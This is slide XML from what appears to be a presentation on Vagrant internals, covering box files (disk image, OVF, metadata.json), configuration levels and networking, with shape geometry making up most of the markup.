              <a:t>box-disk1.vmdk</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-170" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-120" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Hard-Disk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-125" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Image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7747" y="2881764"/>
            <a:ext cx="104139" cy="1270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40"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="800" spc="40" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
                <a:latin typeface="Aroania"/>
                <a:cs typeface="Aroania"/>
              </a:rPr>
              <a:t>▶</a:t>
            </a:r>
            <a:endParaRPr sz="800">
              <a:latin typeface="Aroania"/>
              <a:cs typeface="Aroan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76546" y="3170661"/>
            <a:ext cx="97790" cy="1130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600" spc="-60" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>26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589" y="190436"/>
            <a:ext cx="1899920" cy="716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sz="1200" spc="-150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INTERNALS </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-215" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-295" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-185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DOWNLOAD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140" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Boxes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82645" y="1061297"/>
            <a:ext cx="3643629" cy="1663700"/>
            <a:chOff x="482645" y="1061297"/>
            <a:chExt cx="3643629" cy="1663700"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="object 4"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="482645" y="1536209"/>
              <a:ext cx="1071679" cy="11887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54060" y="1061297"/>
              <a:ext cx="1499628" cy="16634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54095" y="1536209"/>
              <a:ext cx="1071679" cy="118875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2347" y="2853192"/>
            <a:ext cx="1440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200" spc="60" baseline="6944" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
                <a:latin typeface="Aroania"/>
                <a:cs typeface="Aroania"/>
              </a:rPr>
              <a:t>▶ </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-150" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>box.ovf</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-150" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-155" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>CPU, RAM,</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-21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6546" y="3170661"/>
            <a:ext cx="97790" cy="1130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600" spc="-60" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>26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589" y="190436"/>
            <a:ext cx="1899920" cy="716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sz="1200" spc="-150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INTERNALS </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-215" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-295" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-185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DOWNLOAD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140" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Boxes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82645" y="1061297"/>
            <a:ext cx="3643629" cy="1663700"/>
            <a:chOff x="482645" y="1061297"/>
            <a:chExt cx="3643629" cy="1663700"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="object 4"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="482645" y="1536209"/>
              <a:ext cx="1071679" cy="11887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54060" y="1061297"/>
              <a:ext cx="1499628" cy="16634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54095" y="1536209"/>
              <a:ext cx="1071679" cy="118875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2347" y="2853192"/>
            <a:ext cx="2631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200" spc="60" baseline="6944" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
                <a:latin typeface="Aroania"/>
                <a:cs typeface="Aroania"/>
              </a:rPr>
              <a:t>▶ </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-160" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>metadata.json</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-160" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-140" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Name, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-95" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Description, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-110" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Version,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pc="-55" dirty="0"/>
              <a:t>26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417" y="190436"/>
            <a:ext cx="1871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sz="1200" spc="-150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INTERNALS </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-215" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-295" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-185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DOWNLOAD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589" y="666653"/>
            <a:ext cx="774065" cy="4191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200" spc="-105" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Configuration</a:t>
            </a:r>
            <a:endParaRPr sz="12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210"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1000" spc="-130" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>Global: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435" y="1095260"/>
            <a:ext cx="1928634" cy="2062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16555" y="908519"/>
            <a:ext cx="320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20" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>Local: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9255" y="1095006"/>
            <a:ext cx="1928647" cy="10021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16555" y="2109685"/>
            <a:ext cx="46100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Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>Provider: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29255" y="2296171"/>
            <a:ext cx="1928647" cy="1002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pc="-55" dirty="0"/>
              <a:t>27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417" y="190436"/>
            <a:ext cx="17653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sz="1200" spc="-150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INTERNALS </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-215" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-270" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-175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NETWORK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5447" y="781136"/>
            <a:ext cx="3684270" cy="1830070"/>
            <a:chOff x="465447" y="781136"/>
            <a:chExt cx="3684270" cy="1830070"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="object 4"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2026094" y="792231"/>
              <a:ext cx="2110740" cy="1664970"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="2110740" h="1664970">
                  <a:moveTo>
                    <a:pt x="2110346" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1664970"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2110346" y="1664970"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2110346" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="AEC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7097" y="1140574"/>
              <a:ext cx="675005" cy="433070"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="675004" h="433069">
                  <a:moveTo>
                    <a:pt x="386486" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="355398" y="4454"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="327132" y="17035"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="302629" y="36567"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="282829" y="61874"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="281051" y="61836"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="279273" y="61874"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="277495" y="61874"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="223095" y="66990"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="174248" y="81410"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="132828" y="103740"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="100622" y="132664"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="100241" y="132461"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="100152" y="132588"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="60323" y="145323"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="28582" y="167595"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7588" y="197249"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="232130"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9972" y="271805"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="37147" y="304209"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="77409" y="326060"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="126644" y="334073"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="138402" y="333578"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="149759" y="332165"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="160757" y="329937"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="171437" y="326999"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="174612" y="328345"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="177634" y="329958"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="180886" y="331127"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="191060" y="370578"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="218278" y="402801"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="258463" y="424529"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="307543" y="432498"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="356718" y="424480"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="396798" y="402621"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="423782" y="370219"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="433666" y="330568"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="433403" y="322994"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="432573" y="315494"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="431111" y="308160"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="428955" y="301078"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="434352" y="296850"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="439462" y="292552"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="444323" y="288104"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="448970" y="283425"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="468599" y="305745"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="492161" y="322838"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="518873" y="333776"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="547954" y="337629"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="587939" y="330323"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="622714" y="309984"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="650166" y="278982"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="668186" y="239685"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="674662" y="194462"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="668186" y="149214"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="650166" y="109902"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="622714" y="78892"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="587939" y="58550"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="547954" y="51244"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="533235" y="52230"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="519074" y="55102"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="505513" y="59731"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="492594" y="65989"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="472740" y="39090"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="447751" y="18249"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="418657" y="4781"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3864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21024" y="1162647"/>
              <a:ext cx="629920" cy="385445"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="629920" h="385444">
                  <a:moveTo>
                    <a:pt x="374706" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="316555" y="8186"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="280887" y="41118"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="265874" y="64502"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="264325" y="64502"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="262750" y="64642"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="261200" y="64502"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="207555" y="65380"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="157037" y="76978"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="116227" y="99965"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="91706" y="135012"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="93951" y="141480"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="94099" y="142267"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="91186" y="135012"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54388" y="139267"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="25333" y="153573"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6407" y="176928"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="208330"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8578" y="241915"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="31188" y="267351"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="65193" y="283469"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="107962" y="289102"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="119576" y="288873"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="132348" y="288086"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="144808" y="286583"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="155486" y="284212"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="158267" y="285380"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="160947" y="286777"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="163855" y="287844"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="172217" y="323935"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="194891" y="355142"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="229027" y="377080"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="271780" y="385368"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="316052" y="380363"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="353298" y="365625"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="378975" y="341573"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="388543" y="308621"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="388937" y="300269"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="389578" y="289987"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="389658" y="279854"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="388366" y="271944"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="397298" y="265697"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="410973" y="256396"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="424422" y="246966"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="432676" y="240334"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="450632" y="261116"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="472824" y="278518"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="497802" y="290474"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="524116" y="294918"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="566606" y="285798"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="599917" y="260495"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="621658" y="222095"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="629437" y="173684"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="620621" y="124464"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="596598" y="84246"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="561007" y="57118"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="517486" y="47167"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="503015" y="48659"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="487299" y="52564"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="472106" y="58021"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="459206" y="64172"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="438971" y="31865"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="408993" y="10013"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="37470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27596" y="1170887"/>
              <a:ext cx="622935" cy="370840"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="622935" h="370840">
                  <a:moveTo>
                    <a:pt x="356403" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="327237" y="5434"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="302535" y="22319"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="286813" y="52096"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="284588" y="96204"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="263074" y="78877"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="225688" y="69919"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="182186" y="70311"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="142323" y="81035"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="115856" y="103072"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="112541" y="137402"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="71879" y="133933"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="40673" y="139686"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18544" y="152615"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5112" y="170675"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="191819"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2826" y="214002"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13211" y="235178"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="30777" y="253300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="55144" y="266322"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="85933" y="272199"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="122764" y="268884"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="165259" y="254331"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="172801" y="293335"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="193657" y="330950"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="225975" y="359298"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="267900" y="370498"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="317277" y="360605"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="349401" y="332271"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="366253" y="290031"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="369817" y="238418"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="388033" y="241321"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="405717" y="231597"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="420520" y="217717"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="430092" y="208154"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="461093" y="249378"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="495015" y="271770"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="529411" y="277166"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="561838" y="267397"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="589853" y="244299"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="611010" y="209703"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="622865" y="165444"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="612602" y="121206"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="588946" y="87150"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="555245" y="63838"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="514849" y="51828"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="471105" y="51681"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="427361" y="63958"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="425511" y="37995"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="410057" y="17721"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="385515" y="4575"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="35640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67646" y="1231220"/>
              <a:ext cx="564515" cy="222250"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="564514" h="222250">
                  <a:moveTo>
                    <a:pt x="305522" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="278227" y="22255"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="251206" y="70478"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="226343" y="47464"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="185846" y="32389"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="143632" y="29879"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="113620" y="44556"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="109728" y="81045"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="75945" y="92158"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="40833" y="92221"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12737" y="96779"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="121380"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9157" y="157337"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="34612" y="171467"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="64998" y="167995"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="88945" y="151148"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="95084" y="125152"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="96370" y="123766"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="100815" y="126866"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="106361" y="132253"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="110947" y="137725"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="119847" y="146487"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="130521" y="154557"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="139332" y="163272"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="142646" y="173970"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="150022" y="196160"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="170601" y="212927"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="198207" y="222032"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="226663" y="221236"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="249794" y="208302"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="261422" y="180991"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="255371" y="137064"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="257023" y="134438"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="263890" y="136929"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="272895" y="141581"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="280962" y="145434"/>
                  </a:lnTo>
